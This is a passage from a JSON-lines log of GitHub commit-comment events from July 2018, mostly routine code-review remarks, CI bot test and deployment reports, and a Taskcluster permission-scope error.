binaries\r\n4) produce image based on binaries\r\n5) tag images into pipeline/stable IS\r\n\r\nThe jenkins flow with this would be:\r\n1) git clone/fetch source\r\n\r\n--- no extra binaries to compile\r\n\r\n3) build image based on contents of git clone/fetch\r\n4) run tests\r\n5) tag images into pipeline/stable IS\r\n\r\nBut yeah, if that is not the type of flow we want take on with ci-operator, we can re-target this investigation/trello card I have accordingly.\r\n"}},"created_at":"2018-07-15T21:53:03Z"}
{"id":"7968020567","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29714420,"position":null,"line":null,"path":null,"commit_id":"0a4afb74a301f4eea46a8a0ab9e0e1cd91ccf1ea","created_at":"2018-07-15T21:53:37Z","updated_at":"2018-07-15T21:53:37Z","author_association":"OWNER","body":"Created multidev environment [tre#pr-5](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T21:53:37Z"}
{"id":"7968023068","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29714424,"position":5,"line":152,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/NibbleWriter.cs","commit_id":"43715a592484ba8f067786262ace7fe1c8802b28","created_at":"2018-07-15T21:55:40Z","updated_at":"2018-07-15T21:55:40Z","author_association":"OWNER","body":"Hmm, this should rather be ByteCountInSmallBuffer, will fix."}},"created_at":"2018-07-15T21:55:40Z"}
{"id":"7968025097","type":"CommitCommentEvent","actor":{"login":"PhillipPruett"},"repo":{"name":"mezz/JustEnoughItems"},"payload":{"comment":{"id":29714428,"position":null,"line":null,"path":null,"commit_id":"c6e4329b8cf85df9c9a9719dc783a829f45e9e54","created_at":"2018-07-15T21:57:02Z","updated_at":"2018-07-15T21:57:02Z","author_association":"NONE","body":"Hey Mezz, do you have have a suggested workaround for calling unhide() from an eventHandler since this change? "}},"created_at":"2018-07-15T21:57:02Z"}
{"id":"7968025236","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29714429,"position":null,"line":null,"path":null,"commit_id":"9f521aa3a5044551c29f5a5306e5b00ec41be47d","created_at":"2018-07-15T21:57:09Z","updated_at":"2018-07-15T21:57:09Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2007/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 20588 seconds\n\nTests produced 2928 warnings. 2928 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-15T21:57:09Z"}
{"id":"7968027429","type":"CommitCommentEvent","actor":{"login":"esabol"},"repo":{"name":"dluxhu/perl-parallel-forkmanager"},"payload":{"comment":{"id":29714433,"position":4,"line":9,"path":"Changes","commit_id":"2b1c51d593b8c38f948b37ae6f07d26e33ef0da2","created_at":"2018-07-15T21:59:06Z","updated_at":"2018-07-15T21:59:06Z","author_association":"NONE","body":"Typo: \"processed\" should be \"processes\"."}},"created_at":"2018-07-15T21:59:06Z"}
{"id":"7968028075","type":"CommitCommentEvent","actor":{"login":"esabol"},"repo":{"name":"dluxhu/perl-parallel-forkmanager"},"payload":{"comment":{"id":29714434,"position":7,"line":811,"path":"lib/Parallel/ForkManager.pm","commit_id":"2b1c51d593b8c38f948b37ae6f07d26e33ef0da2","created_at":"2018-07-15T21:59:36Z","updated_at":"2018-07-15T21:59:36Z","author_association":"NONE","body":"The word \"so\" should be removed here."}},"created_at":"2018-07-15T21:59:36Z"}
{"id":"7968028216","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29714435,"position":null,"line":null,"path":null,"commit_id":"7c5211da05dc35e223f64408f995d73b656173e2","created_at":"2018-07-15T21:59:43Z","updated_at":"2018-07-15T21:59:43Z","author_association":"OWNER","body":"Created multidev environment [tre#pr-5](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T21:59:43Z"}
{"id":"7968030250","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714445,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T22:01:03Z","updated_at":"2018-07-15T22:01:03Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2983 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-15T22:01:03Z"}
{"id":"7968032740","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29714449,"position":null,"line":null,"path":null,"commit_id":"f91a50b4dc2166b361007e8ea67252b42f58ccd4","created_at":"2018-07-15T22:03:02Z","updated_at":"2018-07-15T22:03:02Z","author_association":"NONE","body":"### Results for event id: 425765e5-bcd4-4d34-bc67-ee660804053d\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (61 lines total):**\n\n```\n...\n>>> unpacking deps-187a55dd2655dbd8da6204eb9d1f36ae.tar.gz to /usr/workspace/clone/node_modules\n\ngzip: stdin: unexpected end of file\ntar: Unexpected EOF in archive\ntar: Unexpected EOF in archive\ntar: Error is not recoverable: exiting now\n>>> running custom build commmand..\nyarn install v1.7.0\n[1/4] Resolving packages...\nsuccess Already up-to-date.\nDone in 0.92s.\nDEPS_FOUND=true\nOK. It looks like we need to deploy sample-http - let's go!\nStarting parallel deployment..\nDeploying package sample-http ..\nCollecting package configuration for sample-http (dev)..\nUsing AWS SSM Parameter Store..\nexport AVTEST=\"ssm-dev\"\nexport SAMPLE_VAR=\"some value\"\nexport SAMPLE_VAR2=\"some value2\"\nfailed printing config for sample-http..\nalias plugin detected..\nalias will be master..\ncat: /usr/workspace/clone/output/*-output.txt: No such file or directory\nApiGateway Endpoints:\ncat: /usr/workspace/clone/output/*-output.txt: No such file or directory\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 261 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T22:03:02Z"}
{"id":"7968033226","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":29714451,"position":null,"line":null,"path":null,"commit_id":"35cce9e543a24a70dbd3660002e6f99aea650c65","created_at":"2018-07-15T22:03:24Z","updated_at":"2018-07-15T22:03:24Z","author_association":"OWNER","body":"Doh,..Thanks!\r\n"}},"created_at":"2018-07-15T22:03:24Z"}
{"id":"7968035637","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29714455,"position":null,"line":null,"path":null,"commit_id":"84262dd9bcadb8a1fa68f998b43823d666339294","created_at":"2018-07-15T22:05:26Z","updated_at":"2018-07-15T22:05:26Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-49](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-49).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-49-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T22:05:26Z"}
{"id":"7968036059","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714459,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T22:05:48Z","updated_at":"2018-07-15T22:05:48Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T22:05:48Z"}
{"id":"7968038043","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29714462,"position":null,"line":null,"path":null,"commit_id":"85388901cf6a69659569ad751767fd7108b25a3c","created_at":"2018-07-15T22:07:31Z","updated_at":"2018-07-15T22:07:31Z","author_association":"MEMBER","body":"Travis uses yml, and I know yml (its very simple imo) :D but well, fine\r\n\r\nand yep, a lot of work"}},"created_at":"2018-07-15T22:07:31Z"}
{"id":"7968038351","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29714463,"position":null,"line":null,"path":null,"commit_id":"7da93d5897e7c919ba507fa335628be36e5e3aee","created_at":"2018-07-15T22:07:48Z","updated_at":"2018-07-15T22:07:48Z","author_association":"NONE","body":"### Results for event id: 42fc801a-854f-4cd2-b11f-bc2d4f2c9543\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (284 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 72.72s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 42fc801a-854f-4cd2-b11f-bc2d4f2c9543-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/42fc801a-854f-4cd2-b11f-bc2d4f2c9543-output.tar.gz\n{\n    \"ETag\": \"\\\"24a9c47ee9395331ddac84f8b9cf5268\\\"\"\n}\nExecution time was 131 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T22:07:48Z"}
{"id":"7968039417","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"stalker314314/pdlib"},"payload":{"comment":{"id":29714464,"position":24,"line":97,"path":"pdlib.cc","commit_id":"7d8863469626a08ee0420c3d571ba4f8b6328b0c","created_at":"2018-07-15T22:08:39Z","updated_at":"2018-07-15T22:08:39Z","author_association":"OWNER","body":"TODO: add detect multi method"}},"created_at":"2018-07-15T22:08:39Z"}
{"id":"7968039567","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"stalker314314/pdlib"},"payload":{"comment":{"id":29714465,"position":13,"line":43,"path":"pdlib.cc","commit_id":"7d8863469626a08ee0420c3d571ba4f8b6328b0c","created_at":"2018-07-15T22:08:48Z","updated_at":"2018-07-15T22:08:48Z","author_association":"OWNER","body":"add exceptions"}},"created_at":"2018-07-15T22:08:48Z"}
{"id":"7968041752","type":"CommitCommentEvent","actor":{"login":"hakobjan"},"repo":{"name":"hakobjan/GA_Git_training"},"payload":{"comment":{"id":29714467,"position":null,"line":null,"path":null,"commit_id":"57765ec6c3cdb05e6f3b68331729657b795a7183","created_at":"2018-07-15T22:10:32Z","updated_at":"2018-07-15T22:10:32Z","author_association":"OWNER","body":"change one "}},"created_at":"2018-07-15T22:10:32Z"}
{"id":"7968042648","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"stalker314314/pdlib"},"payload":{"comment":{"id":29714468,"position":87,"line":87,"path":"src/cnn_face_detection.cc","commit_id":"7d8863469626a08ee0420c3d571ba4f8b6328b0c","created_at":"2018-07-15T22:10:49Z","updated_at":"2018-07-15T22:10:49Z","author_association":"OWNER","body":"return array of rects (array of arrays) (or array of rect objects?)"}},"created_at":"2018-07-15T22:10:49Z"}
{"id":"7968044939","type":"CommitCommentEvent","actor":{"login":"Glowstoner"},"repo":{"name":"FireBlade-Serv/FireAPI"},"payload":{"comment":{"id":29714471,"position":null,"line":null,"path":null,"commit_id":"1ed8d09a24bafd4f3285391d21f1623dfd87e7a7","created_at":"2018-07-15T22:12:05Z","updated_at":"2018-07-15T22:12:05Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [API d'encryption avec utilisation d'un chiffreur automatisé](https://trello.com/c/aGkZHgyN/2-api-dencryption-avec-utilisation-dun-chiffreur-automatis%C3%A9)"}},"created_at":"2018-07-15T22:12:05Z"}
{"id":"7968045681","type":"CommitCommentEvent","actor":{"login":"Glowstoner"},"repo":{"name":"FireBlade-Serv/FireAPI"},"payload":{"comment":{"id":29714472,"position":null,"line":null,"path":null,"commit_id":"1ed8d09a24bafd4f3285391d21f1623dfd87e7a7","created_at":"2018-07-15T22:12:25Z","updated_at":"2018-07-15T22:12:25Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cryptage disponible pour tout les packets.](https://trello.com/c/4VRBOaWU/1-cryptage-disponible-pour-tout-les-packets)"}},"created_at":"2018-07-15T22:12:25Z"}
{"id":"7968046288","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29714473,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-15T22:12:54Z","updated_at":"2018-07-15T22:12:54Z","author_association":"CONTRIBUTOR","body":"The version of the user's manual I use for testing is the one that was in effect at the time I forked the code, and made available in typotests-documents.  Changes made to the document since then are not reflected in it.  In your examples, the spaces in \"E th\" and \"e th\" were fixed in the document source about two months ago, so the space in the name is present in the older version I test with (it is \"supposed\" to be in the output).\r\n\r\nSimilarly, I have no idea why the dotless j was being stripped out of the document source in the makefile.  That was fixed sometime after April of this year.  I even recommend in the readme to build the document without using the makefile.  My opinion is that pretty much all of these makefiles were written to be troublemakers, the reason you've hilited here is one example of that.\r\n\r\nThe ditroff output  for typotests and the merged n-t-roff code are identical for the user's manual after the font-related lines are removed (due to path differences), so that is looking good so far.\r\n\r\nI have an update for the line break differences, but Github is being persnickety and not allowing me to push it.  It gives me two options, neither of which is acceptable.  When it starts behaving or I figure out what it is actually complaining about, I'll push them."}},"created_at":"2018-07-15T22:12:54Z"}
{"id":"7968050899","type":"CommitCommentEvent","actor":{"login":"rodluger"},"repo":{"name":"rodluger/starry"},"payload":{"comment":{"id":29714484,"position":null,"line":null,"path":null,"commit_id":"9de683cc9bc2194ab544b4f688a64649b8901cd9","created_at":"2018-07-15T22:16:42Z","updated_at":"2018-07-15T22:16:42Z","author_association":"OWNER","body":"@dfm What's up with [this line](https://github.com/rodluger/starry/blob/c%2B%2B11/setup.py#L111)? In line 104 above we're setting `c_opts['unix'] += ['-stdlib=libc++' ...`, so this statement always evaluates to `False` on `darwin` and the `c++` compiler gets set to neither 11 nor 14, causing `pybind` to fail."}},"created_at":"2018-07-15T22:16:42Z"}
{"id":"7968050905","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"wsgzao/LTMP"},"payload":{"comment":{"id":29714485,"position":null,"line":null,"path":null,"commit_id":"8a0210330079e2f6e0ab986f8494200d4956781d","created_at":"2018-07-15T22:16:43Z","updated_at":"2018-07-15T22:16:43Z","author_association":"NONE","body":"#8a02103"}},"created_at":"2018-07-15T22:16:43Z"}
{"id":"7968051860","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29714489,"position":135,"line":558,"path":"mono/metadata/cominterop.c","commit_id":"18b6846a3a2218525b7335a1f0515de93a1e44ca","created_at":"2018-07-15T22:17:33Z","updated_at":"2018-07-15T22:17:33Z","author_association":"MEMBER","body":"This g_assert accidentally lost in merge, but ok."}},"created_at":"2018-07-15T22:17:33Z"}
{"id":"7968052412","type":"CommitCommentEvent","actor":{"login":"nevdull77"},"repo":{"name":"nevdull77/SmartThingsPublic"},"payload":{"comment":{"id":29714491,"position":null,"line":null,"path":null,"commit_id":"e2e3f157d6698f7d99becb0451d7d324c2951dd8","created_at":"2018-07-15T22:17:58Z","updated_at":"2018-07-15T22:17:58Z","author_association":"OWNER","body":"First attempt at writing a device handler for SmartThings. Adds support for the thinkeco modlet used to control AC units. If you're participating in ConEd Smart AC program you may have one of these devices. I wasn't able to find an official API from the vendor and implemented the driver based on browser requests. The device handler needs the username, password and modlet name to be supplied in the configuration section to work properly. Controls both from the app and Alexa have been verified working. \r\n\r\n#modlet #smartac #alexa #thinkeco"}},"created_at":"2018-07-15T22:17:58Z"}
{"id":"7968053036","type":"CommitCommentEvent","actor":{"login":"firebird11"},"repo":{"name":"crdroidandroid/android_system_extras_su"},"payload":{"comment":{"id":29714492,"position":null,"line":null,"path":null,"commit_id":"90afa4f6d20ac51b13877832a3a87b56b850fbfd","created_at":"2018-07-15T22:18:23Z","updated_at":"2018-07-15T22:18:23Z","author_association":"MEMBER","body":"It is funny do"}},"created_at":"2018-07-15T22:18:23Z"}
{"id":"7968054711","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"wsgzao/LTMP"},"payload":{"comment":{"id":29714493,"position":null,"line":null,"path":null,"commit_id":"3122328525a20f2d9ce1006a6ee7735d590dacd2","created_at":"2018-07-15T22:19:33Z","updated_at":"2018-07-15T22:19:33Z","author_association":"NONE","body":"#3122328"}},"created_at":"2018-07-15T22:19:33Z"}
{"id":"7968055532","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29714498,"position":5,"line":148,"path":"mcs/class/corlib/System.Runtime.InteropServices/SafeBuffer.cs","commit_id":"18b6846a3a2218525b7335a1f0515de93a1e44ca","created_at":"2018-07-15T22:20:09Z","updated_at":"2018-07-15T22:20:09Z","author_association":"MEMBER","body":"Adding unsafe maybe leftover from earlier edit and not needed."}},"created_at":"2018-07-15T22:20:09Z"}
{"id":"7968057143","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"wsgzao/LTMP"},"payload":{"comment":{"id":29714499,"position":null,"line":null,"path":null,"commit_id":"3122328525a20f2d9ce1006a6ee7735d590dacd2","created_at":"2018-07-15T22:21:29Z","updated_at":"2018-07-15T22:21:29Z","author_association":"NONE","body":"#3122328"}},"created_at":"2018-07-15T22:21:29Z"}
{"id":"7968058211","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714505,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"05067db5c5c49fe2ffd9991517f20beb17e74eb6","created_at":"2018-07-15T22:22:24Z","updated_at":"2018-07-15T22:22:24Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/cat (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/cat\" in any of:"}},"created_at":"2018-07-15T22:22:24Z"}
{"id":"7968058212","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714506,"position":6,"line":null,"path":"pkg/command/cat/fact.go","commit_id":"05067db5c5c49fe2ffd9991517f20beb17e74eb6","created_at":"2018-07-15T22:22:24Z","updated_at":"2018-07-15T22:22:24Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-15T22:22:24Z"}
{"id":"7968058221","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714507,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"05067db5c5c49fe2ffd9991517f20beb17e74eb6","created_at":"2018-07-15T22:22:25Z","updated_at":"2018-07-15T22:22:25Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/cat (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/cat\" in any of:"}},"created_at":"2018-07-15T22:22:25Z"}
{"id":"7968058228","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714508,"position":6,"line":null,"path":"pkg/command/cat/fact.go","commit_id":"05067db5c5c49fe2ffd9991517f20beb17e74eb6","created_at":"2018-07-15T22:22:25Z","updated_at":"2018-07-15T22:22:25Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-15T22:22:25Z"}
{"id":"7968058236","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714509,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"05067db5c5c49fe2ffd9991517f20beb17e74eb6","created_at":"2018-07-15T22:22:25Z","updated_at":"2018-07-15T22:22:25Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/cat\" in any of:"}},"created_at":"2018-07-15T22:22:25Z"}
{"id":"7968058240","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714510,"position":6,"line":null,"path":"pkg/command/cat/fact.go","commit_id":"05067db5c5c49fe2ffd9991517f20beb17e74eb6","created_at":"2018-07-15T22:22:25Z","updated_at":"2018-07-15T22:22:25Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-15T22:22:25Z"}
{"id":"7968058247","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714511,"position":7,"line":null,"path":"pkg/command/cat/cat.go","commit_id":"05067db5c5c49fe2ffd9991517f20beb17e74eb6","created_at":"2018-07-15T22:22:26Z","updated_at":"2018-07-15T22:22:26Z","author_association":"NONE","body":"golint: exported function NewCatCommand should have comment or be unexported"}},"created_at":"2018-07-15T22:22:26Z"}
{"id":"7968058752","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29714513,"position":null,"line":null,"path":null,"commit_id":"125ae46f06383fd69c6b9febac9a33317d12b368","created_at":"2018-07-15T22:22:54Z","updated_at":"2018-07-15T22:22:54Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:repo:github.com/glandium/git-cinnabar:decision-task\",\n    \"queue:route:index.github.glandium.git-cinnabar.*\",\n    \"secrets:get:repo:github.com/glandium.git-cinnabar:codecov\",\n    \"queue:route:index.github.glandium.git-cinnabar.decision.0.5.0b4\"\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/glandium/git-cinnabar:tag:0.5.0b4\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:repo:github.com/glandium/git-cinnabar:decision-task\",\n    \"queue:route:index.github.glandium.git-cinnabar.*\",\n    \"secrets:get:repo:github.com/glandium.git-cinnabar:codecov\",\n    \"queue:route:index.github.glandium.git-cinnabar.decision.0.5.0b4\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/Ehiwjn8-T9aoF2_umVKOiQ\",\n                \"queue:schedule-task:taskcluster-github/Ehiwjn8-T9aoF2_umVKOiQ/Ehiwjn8-T9aoF2_umVKOiQ\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-15T22:22:54.227Z\n\n</details>"}},"created_at":"2018-07-15T22:22:54Z"}
{"id":"7968058959","type":"CommitCommentEvent","actor":{"login":"akhilesh-reddy"},"repo":{"name":"akhilesh-reddy/ProgrammingAssignment2"},"payload":{"comment":{"id":29714514,"position":1,"line":1,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2018-07-15T22:23:06Z","updated_at":"2018-07-15T22:23:06Z","author_association":"OWNER","body":"makeCacheMatrix would create a list of functions that would be used by cacheSolve function to return the cached inverse value of the matrix"}},"created_at":"2018-07-15T22:23:06Z"}
{"id":"7968066576","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29714527,"position":null,"line":null,"path":null,"commit_id":"33dce3aa648d6e167bac3d32e195484f4915f6e0","created_at":"2018-07-15T22:29:43Z","updated_at":"2018-07-15T22:29:43Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-51](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-51).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-51-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T22:29:43Z"}
{"id":"7968066890","type":"CommitCommentEvent","actor":{"login":"zacnomore"},"repo":{"name":"LithiumBeach/Prototypes"},"payload":{"comment":{"id":29714528,"position":null,"line":null,"path":null,"commit_id":"849056347a5b94614190b9a1e3938b18f64ab4dc","created_at":"2018-07-15T22:29:59Z","updated_at":"2018-07-15T22:29:59Z","author_association":"COLLABORATOR","body":"cool"}},"created_at":"2018-07-15T22:29:59Z"}
{"id":"7968066923","type":"CommitCommentEvent","actor":{"login":"fightingtheboss"},"repo":{"name":"gsorokolit/mar26_red0"},"payload":{"comment":{"id":29714529,"position":14,"line":13,"path":"bank_account.rb","commit_id":"52b43975561f67646315022eb8080f205ddb7092","created_at":"2018-07-15T22:30:00Z","updated_at":"2018-07-15T22:30:00Z","author_association":"NONE","body":"No need for the `return` statement here, you can rely on the implicit return (last line of the method)"}},"created_at":"2018-07-15T22:30:00Z"}
